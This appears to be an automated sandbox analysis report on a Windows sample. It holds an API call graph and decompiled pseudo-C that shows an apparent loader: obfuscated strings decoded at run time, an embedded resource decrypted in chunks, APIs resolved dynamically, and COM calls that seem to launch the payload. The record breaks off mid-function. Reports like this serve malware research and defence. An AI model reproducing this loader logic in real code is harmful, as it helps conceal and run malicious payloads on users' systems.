14905->14872 14906->14903 14908 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 14907->14908 14909 417dd6 
14908->14909 14910 40bfc1 __flsbuf 63 API calls 14909->14910 14913 417df4 __mbschr_l 14909->14913 14911 417de4 14910->14911 14912 40e744 __msize 6 API calls 14911->14912 14912->14913 14913->14889 14915 417d7e _strlen 14914->14915 14921 417d7a 14914->14921 14916 40b84d _malloc 63 API calls 14915->14916 14917 417d91 14916->14917 14918 40ef42 _strcpy_s 63 API calls 14917->14918 14917->14921 14919 417da3 14918->14919 14920 40e61c __invoke_watson 10 API calls 14919->14920 14919->14921 14920->14921 14921->14897 14923 40b792 14922->14923 14924 40b7ba 14922->14924 14923->14924 14925 40b79e 14923->14925 14926 40b7cf 14924->14926 14927 40e56a __msize 64 API calls 14924->14927 14929 40bfc1 __flsbuf 63 API calls 14925->14929 14928 40e34f _realloc 72 API calls 14926->14928 14927->14926 14932 40b7b3 _memset 14928->14932 14930 40b7a3 14929->14930 14931 40e744 __msize 6 API calls 14930->14931 14931->14932 14932->14903 14934 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 14933->14934 14935 40ed21 14934->14935 14936 40ed42 14935->14936 14937 40ed75 14935->14937 14950 40ed2a 14935->14950 14938 40bfc1 __flsbuf 63 API calls 14936->14938 14940 40ed99 14937->14940 14941 40ed7f 14937->14941 14939 40ed47 14938->14939 14942 40e744 __msize 6 API calls 14939->14942 14944 40eda1 14940->14944 14945 40edb5 14940->14945 14943 40bfc1 __flsbuf 63 API calls 14941->14943 14942->14950 14947 40ed84 14943->14947 14951 414b9e 14944->14951 14971 414b5c 14945->14971 14949 40e744 __msize 6 API calls 14947->14949 14949->14950 14950->14823 14952 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 14951->14952 14953 414bb2 14952->14953 14954 414bd3 14953->14954 14955 414c06 14953->14955 14970 414bbb 14953->14970 14956 40bfc1 __flsbuf 63 API calls 14954->14956 14957 414c10 14955->14957 14958 414c2a 14955->14958 14959 414bd8 14956->14959 14960 40bfc1 __flsbuf 63 API calls 14957->14960 14961 414c34 14958->14961 14962 414c49 14958->14962 14963 40e744 __msize 6 API calls 14959->14963 14964 414c15 14960->14964 14976 
417c1d 14961->14976 14966 414b5c ___crtCompareStringA 96 API calls 14962->14966 14963->14970 14967 40e744 __msize 6 API calls 14964->14967 14968 414c63 14966->14968 14967->14970 14969 40bfc1 __flsbuf 63 API calls 14968->14969 14968->14970 14969->14970 14970->14950 14972 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 14971->14972 14973 414b6f 14972->14973 14992 4147ec 14973->14992 14977 417c33 14976->14977 14978 417c58 ___ascii_strnicmp 14976->14978 14979 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 14977->14979 14978->14970 14980 417c3e 14979->14980 14981 417c43 14980->14981 14983 417c78 14980->14983 14982 40bfc1 __flsbuf 63 API calls 14981->14982 14985 417c48 14982->14985 14984 417c82 14983->14984 14991 417caa 14983->14991 14986 40bfc1 __flsbuf 63 API calls 14984->14986 14987 40e744 __msize 6 API calls 14985->14987 14988 417c87 14986->14988 14987->14978 14990 40e744 __msize 6 API calls 14988->14990 14989 4168fc 98 API calls __tolower_l 14989->14991 14990->14978 14991->14978 14991->14989 14993 414818 CompareStringW 14992->14993 14995 41482f strncnt 14992->14995 14994 41483b GetLastError 14993->14994 14993->14995 14994->14995 14997 414a95 14995->14997 15000 4148a4 14995->15000 15017 414881 14995->15017 14996 40ce09 __atodbl_l 5 API calls 14998 414b5a 14996->14998 14999 417a20 ___ansicp 87 API calls 14997->14999 14998->14950 15003 414abb 14999->15003 15001 414962 MultiByteToWideChar 15000->15001 15006 4148e6 GetCPInfo 15000->15006 15000->15017 15011 414982 15001->15011 15001->15017 15002 414b1c CompareStringA 15005 414b3a 15002->15005 15002->15017 15003->15002 15004 417a69 ___convertcp 70 API calls 15003->15004 15003->15017 15008 414ae0 15004->15008 15009 40b6b5 ___endstdio 63 API calls 15005->15009 15007 4148f7 15006->15007 15006->15017 15007->15001 15007->15017 15016 417a69 ___convertcp 70 API calls 15008->15016 15008->15017 15012 414b40 15009->15012 15010 4149d9 MultiByteToWideChar 15014 4149f2 MultiByteToWideChar 15010->15014 15015 414a83 15010->15015 15018 
40b84d _malloc 63 API calls 15011->15018 15023 41499f __crtCompareStringA_stat 15011->15023 15013 40b6b5 ___endstdio 63 API calls 15012->15013 15013->15017 15014->15015 15026 414a09 15014->15026 15020 4147ae __freea 63 API calls 15015->15020 15019 414b01 15016->15019 15017->14996 15018->15023 15021 414b16 15019->15021 15022 414b0a 15019->15022 15020->15017 15021->15002 15024 40b6b5 ___endstdio 63 API calls 15022->15024 15023->15010 15023->15017 15024->15017 15025 414a53 MultiByteToWideChar 15027 414a66 CompareStringW 15025->15027 15028 414a7d 15025->15028 15029 414a1f __crtCompareStringA_stat 15026->15029 15030 40b84d _malloc 63 API calls 15026->15030 15027->15028 15031 4147ae __freea 63 API calls 15028->15031 15029->15015 15029->15025 15030->15029 15031->15015 15032->14827 15039 40d0f5 15033->15039 15036 40cd39 15037 40cd62 15036->15037 15038 40cd6e RaiseException 15036->15038 15037->15038 15038->14788 15040 40af59 15039->15040 15041 40d115 _strlen 15039->15041 15040->15036 15041->15040 15042 40b84d _malloc 63 API calls 15041->15042 15043 40d128 15042->15043 15043->15040 15044 40ef42 _strcpy_s 63 API calls 15043->15044 15044->15040 15046 4017e9 15045->15046 15048 40b783 __recalloc 73 API calls 15046->15048 15051 401844 15046->15051 15052 40182d 15046->15052 15048->15052 15049 40b6b5 ___endstdio 63 API calls 15049->15051 15050 40186d MultiByteToWideChar 15050->14794 15050->14795 15051->15050 15055 40b743 15051->15055 15052->15049 15052->15051 15054 401044 15053->15054 15056 40e231 __calloc_impl 63 API calls 15055->15056 15057 40b75d 15056->15057 15058 40bfc1 __flsbuf 63 API calls 15057->15058 15061 40b779 15057->15061 15059 40b770 15058->15059 15060 40bfc1 __flsbuf 63 API calls 15059->15060 15059->15061 15060->15061 15061->15051 15063 40b6b5 _doexit 15062->15063 15064 40b73d _doexit 15063->15064 15065 40b714 HeapFree 15063->15065 15064->14810 15065->15064 15066 40b727 15065->15066 15067 40bfc1 __flsbuf 63 API calls 15066->15067 15067->15064 15069 40aff8 
15068->15069 15070 40b027 15069->15070 15071 40b01f __VEC_memcpy 15069->15071 15070->14818 15071->15070 15073 40e8ea _doexit 15072->15073 15074 40d6e0 __lock 63 API calls 15073->15074 15075 40e8f1 15074->15075 15076 40e9ba __initterm 15075->15076 15077 40e91d 15075->15077 15091 40e9f5 15076->15091 15079 4104e9 __decode_pointer 6 API calls 15077->15079 15081 40e928 15079->15081 15082 40e9aa __initterm 15081->15082 15085 4104e9 __decode_pointer 6 API calls 15081->15085 15082->15076 15084 40e9f2 _doexit 15084->13855 15090 40e93d 15085->15090 15086 40e9e9 15087 40e7ee _doexit 4 API calls 15086->15087 15087->15084 15088 4104e0 6 API calls _doexit 15088->15090 15089 4104e9 6 API calls __decode_pointer 15089->15090 15090->15082 15090->15088 15090->15089 15092 40e9d6 15091->15092 15093 40e9fb 15091->15093 15092->15084 15095 40d606 LeaveCriticalSection 15092->15095 15096 40d606 LeaveCriticalSection 15093->15096 15095->15086 15096->15092

[Figure: control-flow graph of the function at 4019f0; legend: Executed, Not Executed]
                                                                        C-Code - Quality: 77%
                                                                        			E004019F0(void* __edx, void* __eflags) {
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				void* _t337;
                                                                        				void* _t340;
                                                                        				int _t341;
                                                                        				CHAR* _t344;
                                                                        				intOrPtr* _t349;
                                                                        				int _t350;
                                                                        				long _t352;
                                                                        				signed int _t354;
                                                                        				intOrPtr _t358;
                                                                        				long _t359;
                                                                        				CHAR* _t364;
                                                                        				struct HINSTANCE__* _t365;
                                                                        				CHAR* _t366;
                                                                        				_Unknown_base(*)()* _t367;
                                                                        				int _t368;
                                                                        				int _t369;
                                                                        				int _t370;
                                                                        				intOrPtr* _t376;
                                                                        				int _t378;
                                                                        				intOrPtr _t379;
                                                                        				intOrPtr* _t381;
                                                                        				int _t383;
                                                                        				intOrPtr* _t384;
                                                                        				int _t385;
                                                                        				int _t396;
                                                                        				int _t399;
                                                                        				int _t402;
                                                                        				int _t405;
                                                                        				intOrPtr* _t407;
                                                                        				int _t413;
                                                                        				int _t415;
                                                                        				void* _t421;
                                                                        				int _t422;
                                                                        				int _t424;
                                                                        				intOrPtr* _t428;
                                                                        				intOrPtr _t429;
                                                                        				intOrPtr* _t431;
                                                                        				int _t432;
                                                                        				int _t435;
                                                                        				intOrPtr* _t437;
                                                                        				int _t438;
                                                                        				intOrPtr* _t439;
                                                                        				int _t440;
                                                                        				int _t442;
                                                                        				signed int _t448;
                                                                        				signed int _t451;
                                                                        				signed int _t452;
                                                                        				int _t469;
                                                                        				int _t471;
                                                                        				int _t482;
                                                                        				signed int _t486;
                                                                        				intOrPtr* _t488;
                                                                        				intOrPtr* _t490;
                                                                        				intOrPtr* _t492;
                                                                        				intOrPtr _t493;
                                                                        				void* _t494;
                                                                        				struct HRSRC__* _t497;
                                                                        				void* _t514;
                                                                        				int _t519;
                                                                        				intOrPtr* _t520;
                                                                        				void* _t524;
                                                                        				void* _t525;
                                                                        				struct HINSTANCE__* _t526;
                                                                        				intOrPtr _t527;
                                                                        				void* _t531;
                                                                        				void* _t535;
                                                                        				struct HRSRC__* _t536;
                                                                        				intOrPtr* _t537;
                                                                        				intOrPtr* _t539;
                                                                        				int _t542;
                                                                        				int _t543;
                                                                        				intOrPtr* _t547;
                                                                        				intOrPtr* _t548;
                                                                        				intOrPtr* _t549;
                                                                        				intOrPtr* _t550;
                                                                        				void* _t551;
                                                                        				intOrPtr _t552;
                                                                        				int _t555;
                                                                        				void* _t556;
                                                                        				void* _t557;
                                                                        				void* _t558;
                                                                        				void* _t559;
                                                                        				void* _t560;
                                                                        				void* _t561;
                                                                        				void* _t562;
                                                                        				intOrPtr* _t563;
                                                                        				void* _t564;
                                                                        				void* _t565;
                                                                        				void* _t566;
                                                                        				void* _t567;
                                                                        
                                                                        				_t567 = __eflags;
                                                                        				_t494 = __edx;
                                                                        				__imp__OleInitialize(0); // executed
                                                                        				 *((char*)(_t556 + 0x18)) = 0xe0;
                                                                        				 *((char*)(_t556 + 0x19)) = 0x3b;
                                                                        				 *((char*)(_t556 + 0x1a)) = 0x8d;
                                                                        				 *((char*)(_t556 + 0x1b)) = 0x2a;
                                                                        				 *((char*)(_t556 + 0x1c)) = 0xa2;
                                                                        				 *((char*)(_t556 + 0x1d)) = 0x2a;
                                                                        				 *((char*)(_t556 + 0x1e)) = 0x2a;
                                                                        				 *((char*)(_t556 + 0x1f)) = 0x41;
                                                                        				 *((char*)(_t556 + 0x20)) = 0xd3;
                                                                        				 *((char*)(_t556 + 0x21)) = 0x20;
                                                                        				 *((char*)(_t556 + 0x22)) = 0x64;
                                                                        				 *((char*)(_t556 + 0x23)) = 6;
                                                                        				 *((char*)(_t556 + 0x24)) = 0x8a;
                                                                        				 *((char*)(_t556 + 0x25)) = 0xf7;
                                                                        				 *((char*)(_t556 + 0x26)) = 0x3d;
                                                                        				 *((char*)(_t556 + 0x27)) = 0x9d;
                                                                        				 *((char*)(_t556 + 0x28)) = 0xd9;
                                                                        				 *((char*)(_t556 + 0x29)) = 0xee;
                                                                        				 *((char*)(_t556 + 0x2a)) = 0x15;
                                                                        				 *((char*)(_t556 + 0x2b)) = 0x68;
                                                                        				 *((char*)(_t556 + 0x2c)) = 0xf4;
                                                                        				 *((char*)(_t556 + 0x2d)) = 0x76;
                                                                        				 *((char*)(_t556 + 0x2e)) = 0xb9;
                                                                        				 *((char*)(_t556 + 0x2f)) = 0x34;
                                                                        				 *((char*)(_t556 + 0x30)) = 0xbf;
                                                                        				 *((char*)(_t556 + 0x31)) = 0x1e;
                                                                        				 *((char*)(_t556 + 0x32)) = 0xe7;
                                                                        				 *((char*)(_t556 + 0x33)) = 0x78;
                                                                        				 *((char*)(_t556 + 0x34)) = 0x98;
                                                                        				 *((char*)(_t556 + 0x35)) = 0xe9;
                                                                        				 *((char*)(_t556 + 0x36)) = 0x6f;
                                                                        				 *((char*)(_t556 + 0x37)) = 0xb4;
                                                                        				 *((char*)(_t556 + 0x38)) = 0;
                                                                        				_push(E00401650(_t556 + 0x14, _t556 + 0x114));
                                                                        				_t337 = E0040B99E(0, _t494, _t524, _t535, _t567);
                                                                        				_t557 = _t556 + 0xc;
                                                                        				if(_t337 == 0x41b2a0) {
                                                                        					L80:
                                                                        					__eflags = 0;
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t340 = CreateToolhelp32Snapshot(8, GetCurrentProcessId()); // executed
                                                                        					_t525 = _t340;
                                                                        					 *((intOrPtr*)(_t557 + 0x280)) = 0x224;
                                                                        					 *((char*)(_t557 + 0x64)) = 0xce;
                                                                        					 *((char*)(_t557 + 0x65)) = 0x27;
                                                                        					 *((char*)(_t557 + 0x66)) = 0x9c;
                                                                        					 *((char*)(_t557 + 0x67)) = 0x1a;
                                                                        					 *((char*)(_t557 + 0x68)) = 0x95;
                                                                        					 *((char*)(_t557 + 0x69)) = 0x2e;
                                                                        					 *((char*)(_t557 + 0x6a)) = 0x22;
                                                                        					 *((char*)(_t557 + 0x6b)) = 0x57;
                                                                        					 *((char*)(_t557 + 0x6c)) = 0x91;
                                                                        					 *((char*)(_t557 + 0x6d)) = 0x21;
                                                                        					 *((char*)(_t557 + 0x6e)) = 0x57;
                                                                        					 *((char*)(_t557 + 0x6f)) = 0x3a;
                                                                        					 *((char*)(_t557 + 0x70)) = 0xf8;
                                                                        					 *((char*)(_t557 + 0x71)) = 0x98;
                                                                        					 *((char*)(_t557 + 0x72)) = 0x5b;
                                                                        					 *((char*)(_t557 + 0x73)) = 0xf4;
                                                                        					 *((char*)(_t557 + 0x74)) = 0xb5;
                                                                        					 *((char*)(_t557 + 0x75)) = 0x87;
                                                                        					 *((char*)(_t557 + 0x76)) = 0x7b;
                                                                        					 *((char*)(_t557 + 0x77)) = 0xf;
                                                                        					 *((char*)(_t557 + 0x78)) = 0xf4;
                                                                        					 *((char*)(_t557 + 0x79)) = 0x76;
                                                                        					 *((char*)(_t557 + 0x7a)) = 0xb9;
                                                                        					 *((char*)(_t557 + 0x7b)) = 0x34;
                                                                        					 *((char*)(_t557 + 0x7c)) = 0xbf;
                                                                        					 *((char*)(_t557 + 0x7d)) = 0x1e;
                                                                        					 *((char*)(_t557 + 0x7e)) = 0xe7;
                                                                        					 *((char*)(_t557 + 0x7f)) = 0x78;
                                                                        					 *((char*)(_t557 + 0x80)) = 0x98;
                                                                        					 *((char*)(_t557 + 0x81)) = 0xe9;
                                                                        					 *((char*)(_t557 + 0x82)) = 0x6f;
                                                                        					 *((char*)(_t557 + 0x83)) = 0xb4;
                                                                        					 *((char*)(_t557 + 0x84)) = 0;
                                                                        					 *((char*)(_t557 + 0x18)) = 0xc0;
                                                                        					 *((char*)(_t557 + 0x19)) = 0x38;
                                                                        					 *((char*)(_t557 + 0x1a)) = 0x8d;
                                                                        					 *((char*)(_t557 + 0x1b)) = 0x1f;
                                                                        					 *((char*)(_t557 + 0x1c)) = 0x8e;
                                                                        					 *((char*)(_t557 + 0x1d)) = 0x30;
                                                                        					 *((char*)(_t557 + 0x1e)) = 0x65;
                                                                        					 *((char*)(_t557 + 0x1f)) = 0x47;
                                                                        					 *((char*)(_t557 + 0x20)) = 0xd3;
                                                                        					 *((char*)(_t557 + 0x21)) = 0x29;
                                                                        					 *((char*)(_t557 + 0x22)) = 0x3b;
                                                                        					 *((char*)(_t557 + 0x23)) = 0x56;
                                                                        					 *((char*)(_t557 + 0x24)) = 0xf8;
                                                                        					 *((char*)(_t557 + 0x25)) = 0x98;
                                                                        					 *((char*)(_t557 + 0x26)) = 0x5b;
                                                                        					 *((char*)(_t557 + 0x27)) = 0xf4;
                                                                        					 *((char*)(_t557 + 0x28)) = 0xb5;
                                                                        					 *((char*)(_t557 + 0x29)) = 0x87;
                                                                        					 *((char*)(_t557 + 0x2a)) = 0x7b;
                                                                        					 *((char*)(_t557 + 0x2b)) = 0xf;
                                                                        					 *((char*)(_t557 + 0x2c)) = 0xf4;
                                                                        					 *((char*)(_t557 + 0x2d)) = 0x76;
                                                                        					 *((char*)(_t557 + 0x2e)) = 0xb9;
                                                                        					 *((char*)(_t557 + 0x2f)) = 0x34;
                                                                        					 *((char*)(_t557 + 0x30)) = 0xbf;
                                                                        					 *((char*)(_t557 + 0x31)) = 0x1e;
                                                                        					 *((char*)(_t557 + 0x32)) = 0xe7;
                                                                        					 *((char*)(_t557 + 0x33)) = 0x78;
                                                                        					 *((char*)(_t557 + 0x34)) = 0x98;
                                                                        					 *((char*)(_t557 + 0x35)) = 0xe9;
                                                                        					 *((char*)(_t557 + 0x36)) = 0x6f;
                                                                        					 *((char*)(_t557 + 0x37)) = 0xb4;
                                                                        					 *((char*)(_t557 + 0x38)) = 0;
                                                                        					_t341 = Module32First(_t525, _t557 + 0x278); // executed
                                                                        					if(_t341 == 0) {
                                                                        						L38:
                                                                        						FindCloseChangeNotification(_t525); // executed
                                                                        						_t526 = GetModuleHandleA(0);
                                                                        						 *((char*)(_t557 + 0x1c)) = 0xfc;
                                                                        						 *((char*)(_t557 + 0x1d)) = 0xb;
                                                                        						 *((char*)(_t557 + 0x1e)) = 0xff;
                                                                        						 *((char*)(_t557 + 0x1f)) = 0x75;
                                                                        						 *((char*)(_t557 + 0x20)) = 0xe7;
                                                                        						 *((char*)(_t557 + 0x21)) = 0x44;
                                                                        						 *((char*)(_t557 + 0x22)) = 0x4b;
                                                                        						 *((char*)(_t557 + 0x23)) = 0x23;
                                                                        						 *((char*)(_t557 + 0x24)) = 0xbf;
                                                                        						 *((char*)(_t557 + 0x25)) = 0x45;
                                                                        						 *((char*)(_t557 + 0x26)) = 0x3b;
                                                                        						 *((char*)(_t557 + 0x27)) = 0x56;
                                                                        						 *((char*)(_t557 + 0x28)) = 0xf8;
                                                                        						 *((char*)(_t557 + 0x29)) = 0x98;
                                                                        						 *((char*)(_t557 + 0x2a)) = 0x5b;
                                                                        						 *((char*)(_t557 + 0x2b)) = 0xf4;
                                                                        						 *((char*)(_t557 + 0x2c)) = 0xb5;
                                                                        						 *((char*)(_t557 + 0x2d)) = 0x87;
                                                                        						 *((char*)(_t557 + 0x2e)) = 0x7b;
                                                                        						 *((char*)(_t557 + 0x2f)) = 0xf;
                                                                        						 *((char*)(_t557 + 0x30)) = 0xf4;
                                                                        						 *((char*)(_t557 + 0x31)) = 0x76;
                                                                        						 *((char*)(_t557 + 0x32)) = 0xb9;
                                                                        						 *((char*)(_t557 + 0x33)) = 0x34;
                                                                        						 *((char*)(_t557 + 0x34)) = 0xbf;
                                                                        						 *((char*)(_t557 + 0x35)) = 0x1e;
                                                                        						 *((char*)(_t557 + 0x36)) = 0xe7;
                                                                        						 *((char*)(_t557 + 0x37)) = 0x78;
                                                                        						 *((char*)(_t557 + 0x38)) = 0x98;
                                                                        						 *((char*)(_t557 + 0x39)) = 0xe9;
                                                                        						 *((char*)(_t557 + 0x3a)) = 0x6f;
                                                                        						 *((char*)(_t557 + 0x3b)) = 0xb4;
                                                                        						 *((char*)(_t557 + 0x3c)) = 0;
                                                                        						_t344 = E00401650(_t557 + 0x18, _t557 + 0x158);
                                                                        						_t558 = _t557 + 8;
                                                                        						_t536 = FindResourceA(_t526, _t344, 0xa);
                                                                        						 *(_t558 + 0x50) = _t536;
                                                                        						_t551 = LoadResource(_t526, _t536);
                                                                        						 *((intOrPtr*)(_t558 + 0x44)) = LockResource(_t551);
                                                                        						_t349 = E0040B84D(0, _t557 + 0x18, _t526, SizeofResource(_t526, _t536)); // executed
                                                                        						_push(0x40022);
                                                                        						_t537 = _t349; // executed
                                                                        						_t350 = E0040AF66(0, _t526, __eflags); // executed
                                                                        						_t559 = _t558 + 8;
                                                                        						 *(_t559 + 0x34) = _t350;
                                                                        						__eflags = _t350;
                                                                        						if(_t350 == 0) {
                                                                        							 *(_t559 + 0x50) = 0;
                                                                        						} else {
                                                                        							E0040BA30(_t526, _t350, 0, 0x40022);
                                                                        							_t486 =  *(_t559 + 0x40);
                                                                        							_t559 = _t559 + 0xc;
                                                                        							 *(_t559 + 0x50) = _t486;
                                                                        						}
                                                                        						E00401300( *(_t559 + 0x50));
                                                                        						_t497 =  *(_t559 + 0x48);
                                                                        						_t352 = SizeofResource(_t526, _t497);
                                                                        						 *(_t559 + 0x40) = _t352;
                                                                        						asm("cdq");
                                                                        						_t354 = _t352 + (_t497 & 0x000003ff) >> 0xa;
                                                                        						__eflags = _t354;
                                                                        						if(_t354 > 0) {
                                                                        							_t519 =  *(_t559 + 0x3c);
                                                                        							_t482 = _t537 - _t519;
                                                                        							__eflags = _t482;
                                                                        							 *(_t559 + 0x34) = _t519;
                                                                        							 *(_t559 + 0x88) = _t482;
                                                                        							 *(_t559 + 0x38) = _t354;
                                                                        							do {
                                                                        								_t424 =  *(_t559 + 0x34);
                                                                        								_push( *(_t559 + 0x88) + _t424);
                                                                        								_push(0x400);
                                                                        								_push(_t424);
                                                                        								E00401560(0,  *((intOrPtr*)(_t559 + 0x54)));
                                                                        								 *(_t559 + 0x34) =  *(_t559 + 0x34) + 0x400;
                                                                        								_t179 = _t559 + 0x38;
                                                                        								 *_t179 =  *(_t559 + 0x38) - 1;
                                                                        								__eflags =  *_t179;
                                                                        							} while ( *_t179 != 0);
                                                                        						}
                                                                        						_t448 =  *(_t559 + 0x40) & 0x800003ff;
                                                                        						__eflags = _t448;
                                                                        						if(_t448 < 0) {
                                                                        							_t448 = (_t448 - 0x00000001 | 0xfffffc00) + 1;
                                                                        							__eflags = _t448;
                                                                        						}
                                                                        						__eflags = _t448;
                                                                        						if(_t448 > 0) {
                                                                        							_t421 =  *(_t559 + 0x40) - _t448;
                                                                        							_push(_t421 + _t537);
                                                                        							_push(_t448);
                                                                        							_t422 = _t421 +  *((intOrPtr*)(_t559 + 0x44));
                                                                        							__eflags = _t422;
                                                                        							_push(_t422);
                                                                        							E00401560(0,  *((intOrPtr*)(_t559 + 0x58)));
                                                                        						}
                                                                        						E0040BA30(_t526,  *(_t559 + 0x3c), 0,  *(_t559 + 0x40));
                                                                        						_t560 = _t559 + 0xc;
                                                                        						FreeResource(_t551);
                                                                        						_t552 =  *_t537;
                                                                        						 *((intOrPtr*)(_t560 + 0x94)) = _t552;
                                                                        						_t358 = E0040B84D(0,  *(_t559 + 0x40), _t526, _t552); // executed
                                                                        						_t561 = _t560 + 4;
                                                                        						 *((intOrPtr*)(_t561 + 0x40)) = _t358;
                                                                        						_t359 = SizeofResource(_t526,  *(_t560 + 0x4c));
                                                                        						_t527 =  *((intOrPtr*)(_t561 + 0x38));
                                                                        						_t192 = _t537 + 4; // 0x4
                                                                        						E0040AC60(_t527, _t561 + 0x98, _t192, _t359);
                                                                        						E0040BA30(_t527, _t537, 0,  *((intOrPtr*)(_t561 + 0x50)));
                                                                        						_t528 = _t527 + 0xe;
                                                                        						 *((char*)(_t561 + 0x34)) = 0xce;
                                                                        						 *((char*)(_t561 + 0x35)) = 0x27;
                                                                        						 *((char*)(_t561 + 0x36)) = 0x9c;
                                                                        						 *((char*)(_t561 + 0x37)) = 0x1a;
                                                                        						 *((char*)(_t561 + 0x38)) = 0x95;
                                                                        						 *((char*)(_t561 + 0x39)) = 0x21;
                                                                        						 *((char*)(_t561 + 0x3a)) = 0x2e;
                                                                        						 *((char*)(_t561 + 0x3b)) = 0xd;
                                                                        						 *((char*)(_t561 + 0x3c)) = 0xdb;
                                                                        						 *((char*)(_t561 + 0x3d)) = 0x29;
                                                                        						 *((char*)(_t561 + 0x3e)) = 0x57;
                                                                        						 *((char*)(_t561 + 0x3f)) = 0x56;
                                                                        						 *((char*)(_t561 + 0x40)) = 0xf8;
                                                                        						 *((char*)(_t561 + 0x41)) = 0x98;
                                                                        						 *((char*)(_t561 + 0x42)) = 0x5b;
                                                                        						 *((char*)(_t561 + 0x43)) = 0xf4;
                                                                        						 *((char*)(_t561 + 0x44)) = 0xb5;
                                                                        						 *((char*)(_t561 + 0x45)) = 0x87;
                                                                        						 *((char*)(_t561 + 0x46)) = 0x7b;
                                                                        						 *((char*)(_t561 + 0x47)) = 0xf;
                                                                        						 *((char*)(_t561 + 0x48)) = 0xf4;
                                                                        						 *((char*)(_t561 + 0x49)) = 0x76;
                                                                        						 *((char*)(_t561 + 0x4a)) = 0xb9;
                                                                        						 *((char*)(_t561 + 0x4b)) = 0x34;
                                                                        						 *((char*)(_t561 + 0x4c)) = 0xbf;
                                                                        						 *((char*)(_t561 + 0x4d)) = 0x1e;
                                                                        						 *((char*)(_t561 + 0x4e)) = 0xe7;
                                                                        						 *((char*)(_t561 + 0x4f)) = 0x78;
                                                                        						 *((char*)(_t561 + 0x50)) = 0x98;
                                                                        						 *((char*)(_t561 + 0x51)) = 0xe9;
                                                                        						 *((char*)(_t561 + 0x52)) = 0x6f;
                                                                        						 *((char*)(_t561 + 0x53)) = 0xb4;
                                                                        						 *((char*)(_t561 + 0x54)) = 0;
                                                                        						_t364 = E00401650(_t561 + 0x30, _t561 + 0x110);
                                                                        						_t562 = _t561 + 0x24;
                                                                        						_t365 = LoadLibraryA(_t364); // executed
                                                                        						_t538 = _t365;
                                                                        						 *((char*)(_t562 + 0x10)) = 0xe0;
                                                                        						 *((char*)(_t562 + 0x11)) = 0x18;
                                                                        						 *((char*)(_t562 + 0x12)) = 0xad;
                                                                        						 *((char*)(_t562 + 0x13)) = 0x36;
                                                                        						 *((char*)(_t562 + 0x14)) = 0x95;
                                                                        						 *((char*)(_t562 + 0x15)) = 0x21;
                                                                        						_t451 = _t562 + 0x134;
                                                                        						 *((char*)(_t562 + 0x1e)) = 0x2a;
                                                                        						 *((char*)(_t562 + 0x1f)) = 0x57;
                                                                        						 *((char*)(_t562 + 0x20)) = 0xda;
                                                                        						 *((char*)(_t562 + 0x21)) = 0xc;
                                                                        						 *((char*)(_t562 + 0x22)) = 0x55;
                                                                        						 *((char*)(_t562 + 0x23)) = 0x25;
                                                                        						 *((char*)(_t562 + 0x24)) = 0x8c;
                                                                        						 *((char*)(_t562 + 0x25)) = 0xf9;
                                                                        						 *((char*)(_t562 + 0x26)) = 0x35;
                                                                        						 *((char*)(_t562 + 0x27)) = 0x97;
                                                                        						 *((char*)(_t562 + 0x28)) = 0xd0;
                                                                        						 *((char*)(_t562 + 0x29)) = 0x87;
                                                                        						 *((char*)(_t562 + 0x2a)) = 0x7b;
                                                                        						 *((char*)(_t562 + 0x2b)) = 0xf;
                                                                        						 *((char*)(_t562 + 0x2c)) = 0xf4;
                                                                        						 *((char*)(_t562 + 0x2d)) = 0x76;
                                                                        						 *((char*)(_t562 + 0x2e)) = 0xb9;
                                                                        						 *((char*)(_t562 + 0x2f)) = 0x34;
                                                                        						 *((char*)(_t562 + 0x30)) = 0xbf;
                                                                        						 *((char*)(_t562 + 0x31)) = 0x1e;
                                                                        						 *((char*)(_t562 + 0x32)) = 0xe7;
                                                                        						 *((char*)(_t562 + 0x33)) = 0x78;
                                                                        						 *((char*)(_t562 + 0x34)) = 0x98;
                                                                        						 *((char*)(_t562 + 0x35)) = 0xe9;
                                                                        						 *((char*)(_t562 + 0x36)) = 0x6f;
                                                                        						 *((char*)(_t562 + 0x37)) = 0xb4;
                                                                        						 *((char*)(_t562 + 0x38)) = 0;
                                                                        						_t366 = E00401650(_t562 + 0x14, _t451);
                                                                        						_t563 = _t562 + 8;
                                                                        						_t367 = GetProcAddress(_t365, _t366);
                                                                        						__eflags = _t367;
                                                                        						_t452 = _t451 & 0xffffff00 | _t367 != 0x00000000;
                                                                        						__eflags = _t452;
                                                                        						 *(_t563 + 0x47) = _t452 == 0;
                                                                        						 *0x423480 = _t367;
                                                                        						 *((intOrPtr*)(_t563 + 0x80)) = 0;
                                                                        						 *((intOrPtr*)(_t563 + 0x84)) = 0;
                                                                        						 *((intOrPtr*)(_t563 + 0x4c)) = 0;
                                                                        						 *(_t563 + 0x58) = 0;
                                                                        						 *(_t563 + 0x54) = 0;
                                                                        						__eflags = _t452;
                                                                        						if(_t452 != 0) {
                                                                        							_t368 =  *_t367(0x41b230, 0x41b220, _t563 + 0x80); // executed
                                                                        							__eflags = _t368;
                                                                        							if(_t368 >= 0) {
                                                                        								__eflags =  *(_t563 + 0x47);
                                                                        								if( *(_t563 + 0x47) == 0) {
                                                                        									 *((intOrPtr*)(_t563 + 0x17c)) = _t563 + 0x17c;
                                                                        									E004018F0( *((intOrPtr*)(_t563 + 0x38)), _t563 + 0x17c, _t563 + 0x17c,  *((intOrPtr*)(_t563 + 0x38)), 3);
                                                                        									_t376 =  *((intOrPtr*)(_t563 + 0x80));
                                                                        									_t378 =  *((intOrPtr*)( *((intOrPtr*)( *_t376 + 0xc))))(_t376,  *((intOrPtr*)(_t563 + 0x178)), 0x41b240, _t563 + 0x84); // executed
                                                                        									__eflags = _t378;
                                                                        									if(_t378 >= 0) {
                                                                        										_t381 =  *((intOrPtr*)(_t563 + 0x84));
                                                                        										_t383 =  *((intOrPtr*)( *((intOrPtr*)( *_t381 + 0x24))))(_t381, 0x41b210, 0x41b290, _t563 + 0x4c); // executed
                                                                        										__eflags = _t383;
                                                                        										if(_t383 >= 0) {
                                                                        											_t384 =  *((intOrPtr*)(_t563 + 0x4c));
                                                                        											_t385 =  *((intOrPtr*)( *((intOrPtr*)( *_t384 + 0x28))))(_t384); // executed
                                                                        											__eflags = _t385;
                                                                        											if(_t385 >= 0) {
                                                                        												 *((intOrPtr*)(_t563 + 0x38)) = 0;
